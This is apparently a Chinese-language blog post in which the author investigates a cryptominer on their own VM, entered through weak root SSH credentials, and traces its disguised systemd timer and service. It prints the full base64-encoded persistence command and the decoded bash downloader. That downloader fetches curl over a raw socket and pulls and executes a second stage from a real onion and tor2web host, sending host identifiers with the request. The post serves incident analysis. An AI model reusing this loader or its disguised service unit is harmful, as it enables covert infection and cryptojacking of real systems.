xXxYOLOxXx

xXxYOLOxXx

ESo1YS_Miner_Analysis

Posted on Edited on In

给枯燥的工作平添一分不确定性罢了

失陷

temper monkey脚本写得正开心, 切到虚拟机一看右上角cpu跑满了
top一看cpu跑到170了都, 基本就是挖矿了

1
2
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                       
34967 root      20   0 2438752   8308      4 S 176.1   0.2 143:44.29 qMubU9A
1
2
netstat -antlp | grep 34967
tcp        0      0 172.31.130.144:54302    89.223.120.251:9090     ESTABLISHED 34967/qMubU9A

IP丢到微步看了下确定是公共矿池

溯源

虚拟机就开了个ssh, root还是弱口令

1
2
cat /var/log/auth.log | grep Accept
Jul 16 11:35:40 localhost sshd[1183603]: Accepted password for root from 172.31.134.56 port 41378 ssh2

果然

nmap扫了一下这个IP, 开的端口还挺多, 不知道是谁的服务器
跟网管反馈了下也是爱答不理
无所谓了, 把自己手上这个挖矿程序处理掉就行
正好最近项目要一点恶意程序, 直接把/proc/pid/exe拉出来丢给同事了
笑死

维持

本来还以为是会写个计划任务, 看到后面发现是服务

1
2
ps axo pid,ppid,comm | grep 34967
  34967     531 qMubU9A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ps axo pid,ppid,comm | grep 531  
    531       1 systemd
    534     531 (sd-pam)
    682     531 dbus-daemon
    991     531 gnome-keyring-d
   1096     531 at-spi-bus-laun
   1108     531 xfconfd
   1114     531 at-spi2-registr
   1126     531 gpg-agent
   1132     531 gvfsd
   1138     531 gvfsd-fuse
   1233     531 pulseaudio
   1234     531 xfce4-notifyd
   1288     531 dconf-service
   1344     531 gvfs-udisks2-vo
   1413     531 gvfs-afc-volume
   1419     531 gvfs-mtp-volume
   1424     531 gvfs-gphoto2-vo
   1433     531 gvfs-goa-volume
   1458     531 gvfsd-metadata
   1476     531 obexd
   1691     531 FOe1wQ9
  34967     531 qMubU9A
  54540     531 JxM0JUD

基本就是后面三个程序有问题了

1
2
3
4
5
6
systemctl status | grep -C 5 FOe1wQ9

                 │ ├─systemd-tmpfiles-cleanup.service
                 │ │ ├─ 1691 FOe1wQ9
                 │ │ ├─34967 qMubU9A
                 │ │ └─54540 JxM0JUD

定位到服务位置

1
2
3
4
5
6
locate systemd-tmpfiles-cleanup
/root/.config/systemd/user/systemd-tmpfiles-cleanup
/root/.config/systemd/user/systemd-tmpfiles-cleanup.service
/root/.config/systemd/user/systemd-tmpfiles-cleanup.timer
/root/.config/systemd/user/timers.target.wants/systemd-tmpfiles-cleanup.timer
/root/.local/share/systemd/timers/stamp-systemd-tmpfiles-cleanup.timer

看下路径结构

1
2
3
4
5
6
7
tree /root/.config/systemd/user 
/root/.config/systemd/user
├── systemd-tmpfiles-cleanup
├── systemd-tmpfiles-cleanup.service
├── systemd-tmpfiles-cleanup.timer
└── timers.target.wants
    └── systemd-tmpfiles-cleanup.timer -> /root/.config/systemd/user/systemd-tmpfiles-cleanup.timer

每小时运行

1
2
3
4
5
6
7
8
cat systemd-tmpfiles-cleanup.timer  
[Unit]
Description=Cleanup of User's Temporary Files
[Timer]
OnCalendar=hourly
Persistent=true
[Install]
WantedBy=timers.target

维持运行程序

1
2
3
4
5
6
7
cat /root/.config/systemd/user/systemd-tmpfiles-cleanup.service
[Unit]
Description=Cleanup of User's Temporary Files
[Service]
Type=forking
ExecStart=/bin/bash -c "exec &>/dev/null;echo ESo1YS;echo RVNvMVlTCmV4ZWMgJj4vZGV2L251bGwKZXd2QkJlQ209Li8uJChkYXRlfG1kNXN1bXxoZWFkIC1jMjApCnFkbm1DdUZlPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCmZ1V3RPY1RUPSIvdG1wL3N5c3RlbWQtcHJpdmF0ZS1hMTNiNTBiYTgzYmNjMzY3OTc5NWZlYzJmMTA2ZDAyZS1zeXN0ZW1kLWxvZ2luZC5zZXJ2aWNlLUVTbzFZUyIKa3pLWXBCVnI9ImN1cmwgLW02MCAtZnNTTGtBLSAtLWRvaC11cmwgaHR0cHM6Ly8ke3Fkbm1DdUZlWyQoKFJBTkRPTSUkeyNxZG5tQ3VGZVtAXX0pKV19L2Rucy1xdWVyeSIKektqSmtWV0Y9ImN1cmwgLW02MCAtZnNTTGtBLSIKY1ZYZnVWWm89InJlbGF5LnRvcjJzb2Nrcy5pbiIKdkJaakdNeEY9InJ1NnI0aW5rYWY0dGhsZ2ZsZzRpcXM1bWhxd3F1Ym9sczVxYWdzcHZ5YTR3aHAzZGdidm15aGFkIgpQQVRIPS90bXA6JGZ1V3RPY1RUOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbjokUEFUSAoKU3JUbElNa1QoKSB7CglyZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCglET0M9LyR7cGF0aC8vIC8vfQoJSE9TVD0ke3NlcnZlci8vOip9CglQT1JUPSR7c2VydmVyLy8qOn0KCVtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCglleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKCWVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcblVzZXItQWdlbnQ6IC1cclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKCSh3aGlsZSByZWFkIGxpbmU7IGRvCglbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCglkb25lICYmIGNhdCkgPCYzCglleGVjIDM+Ji0KfQoKSXZaWnlvWXMoKSB7Cglmb3IgaSBpbiAkZnVXdE9jVFQgLiAvdXNyL2JpbiAvdmFyL3RtcCAvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9CgpzbWhnY1FYUygpIHsKCWdKaWJ3TXBCPS9leGVjCglKek5aeWdXTT1jcjBfJChjdXJsIC00IGlkZW50Lm1lfHxjdXJsIC00IGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbilfJCh1bmFtZSAtcilfJChjYXQgL2V0Yy9tYWNoaW5lLWlkfHwoaXAgcnx8aG9zdG5hbWUgLWl8fGVjaG8gbm8taWQpfG1kNXN1bXxhd2sgTkY9MSkKCSRrektZcEJWciAteCBzb2NrczVoOi8vJGNWWGZ1VlpvOjkwNTAgLWUkSnpOWnlnV00gJHZCWmpHTXhGLm9uaW9uJGdKaWJ3TXBCIC1vJGV3dkJCZUNtIHx8ICRrektZcEJWciAtZSRKek5aeWdXTSAkMSRnSmlid01wQiAtbyRld3ZCQmVDbSB8fCAkektqSmtWV0YgLXggc29ja3M1aDovLyRjVlhmdVZabzo5MDUwIC1lJEp6Tlp5Z1dNICR2QlpqR014Ri5vbmlvbiRnSmlid01wQiAtbyRld3ZCQmVDbSB8fCAkektqSmtWV0YgLWUkSnpOWnlnV00gJDEkZ0ppYndNcEIgLW8kZXd2QkJlQ20KfQoKbVlWZVRMRFAoKSB7CgljaG1vZCAreCAkZXd2QkJlQ207JGV3dkJCZUNtO3JtIC1mICRld3ZCQmVDbQp9CgpCcE5SS0RlWSgpIHsKCXU9JHZCWmpHTXhGLnRvcjJ3ZWIuaXQvbG9hZC8KCWNkIC90bXAgJiYgY3VybCAtViB8fCAoU3JUbElNa1QgaHR0cDovLyR1L2N1KSB8IHRhciB6eHAKCUl2Wlp5b1lzCglzbWhnY1FYUyAkdkJaakdNeEYudG9yMndlYi5pdCB8fAoJc21oZ2NRWFMgJHZCWmpHTXhGLnRvcjJ3ZWIuaW4gfHwKCXNtaGdjUVhTICR2QlpqR014Ri50b3Iyd2ViLnJlCgltWVZlVExEUAp9CgpscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uc3lzdGVtZC4xKS9tYXBzIHx8IEJwTlJLRGVZCg==|base64 -d|bash"
WorkingDirectory=~

Downloader

解码结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
ESo1YS
exec &>/dev/null
ewvBBeCm=./.$(date|md5sum|head -c20) # filename
qdnmCuFe=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
fuWtOcTT="/tmp/systemd-private-a13b50ba83bcc3679795fec2f106d02e-systemd-logind.service-ESo1YS"
kzKYpBVr="curl -m60 -fsSLkA- --doh-url https://${qdnmCuFe[$((RANDOM%${#qdnmCuFe[@]}))]}/dns-query" # dns over https
zKjJkVWF="curl -m60 -fsSLkA-" # curl
cVXfuVZo="relay.tor2socks.in" # proxy
vBZjGMxF="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$fuWtOcTT:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH

SrTlIMkT() {
	read proto server path <<<$(echo ${1//// })
	DOC=/${path// //}  # /load/cu
	HOST=${server//:*} # ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it
	PORT=${server//*:} # ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it
	[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
	exec 3<>/dev/tcp/${HOST}/$PORT # Open TCP Socket ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it:80
	echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: ${HOST}\r\n\r\n" >&3 # HTTP Request
	(while read line; do
	[[ "$line" == $'\r' ]] && break
	done && cat) <&3 # Download curl
	exec 3>&- # Close TCP Socket
}

IvZZyoYs() {
	for i in $fuWtOcTT . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done # Check write privilege in directories
}

smhgcQXS() {
	gJibwMpB=/exec
	JzNZygWM=cr0_$(curl -4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1) #system info as referer
	$kzKYpBVr -x socks5h://$cVXfuVZo:9050 -e$JzNZygWM $vBZjGMxF.onion$gJibwMpB -o$ewvBBeCm || $kzKYpBVr -e$JzNZygWM $1$gJibwMpB -o$ewvBBeCm || $zKjJkVWF -x socks5h://$cVXfuVZo:9050 -e$JzNZygWM $vBZjGMxF.onion$gJibwMpB -o$ewvBBeCm || $zKjJkVWF -e$JzNZygWM $1$gJibwMpB -o$ewvBBeCm # ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion/exec via proxy socks5h://relay.tor2socks.in:9500 or $1/exec
}

mYVeTLDP() {
	chmod +x $ewvBBeCm;$ewvBBeCm;rm -f $ewvBBeCm # Execute
}

BpNRKDeY() {
	u=$vBZjGMxF.tor2web.it/load/
	cd /tmp && curl -V || (SrTlIMkT http://$u/cu) | tar zxp # Check curl, download curl if can't run it
	IvZZyoYs
	smhgcQXS $vBZjGMxF.tor2web.it ||
	smhgcQXS $vBZjGMxF.tor2web.in ||
	smhgcQXS $vBZjGMxF.tor2web.re
	mYVeTLDP
}

ls /proc/$(head -1 /tmp/.systemd.1)/maps || BpNRKDeY # Sandbox detection? Not sure.

暂且叫这玩意ESo1YS_Minder

一步步看

1
cd /tmp && curl -V || (SrTlIMkT http://$u//cu) | tar zxp

这里是看有没有curl这个程序, 没有的话再进到后面的函数SrTlIMkT()

函数SrTlIMkT()丢进去的参数是http://ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it/load//cu

域名是ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it
端口是80
建立起一个TCP Socket连接, 也就是fd 3, 之后开始发起一个HTTP请求

1
2
3
4
GET /load/cu/ HTTP/1.0
User-Agent: -
Host: ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it

然后从fd 3获取HTTP响应内容
最后关闭这个Socket

下载解压后是一个curl程序

1
2
3
4
5
./curl --version
curl 7.85.0 (oasis) libcurl/7.85.0 BearSSL zlib/1.2.11
Release-Date: 2022-08-31
Protocols: dict file ftp ftps gopher gophers http https imap imaps mqtt rtsp smtp smtps telnet tftp 
Features: alt-svc AsynchDNS HSTS IPv6 Largefile libz SSL threadsafe UnixSockets

函数IvZZyoYs()用于检查路径的写权限

函数smhgcQXS()用于下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -x socks5h://relay.tor2socks.in:9050 -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion/exec -o$random_string

curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it/exec -o$random_string

curl -m60 -fsSLkA- -x socks5h://relay.tor2socks.in:9050 -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion/exec -o$random_string

curl -m60 -fsSLkA- -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it/exec -o$random_string

curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.in/exec -o$random_string

curl -m60 -fsSLkA- -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.in/exec -o$random_string

curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.re/exec -o$random_string

curl -m60 -fsSLkA- -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.re/exec -o$random_string

下载后得到文件md5为73838d160eb7a23dfc8def07e8db1fa5
运行后貌似会再生成两个文件4045022d9d8a7c30bf9bfeb869316787dd4b52f33373c57093f1df396a76e058
4045022d9d8a7c30bf9bfeb869316787会对内网进行扫描, dd4b52f33373c57093f1df396a76e058则是挖矿程序
三个文件都是魔改UPX加壳, 需要手工脱壳, 等什么时候有时间看一下吧

IDA上linux远程调试会提示是so文件,需要在附加的进程中进行调试

用gdbserver调试会走进一个莫名其妙的syscall exit直接把程序退了,解压缩操作愣是没看见

估计是有反动调了

看来还是没能力脱这个壳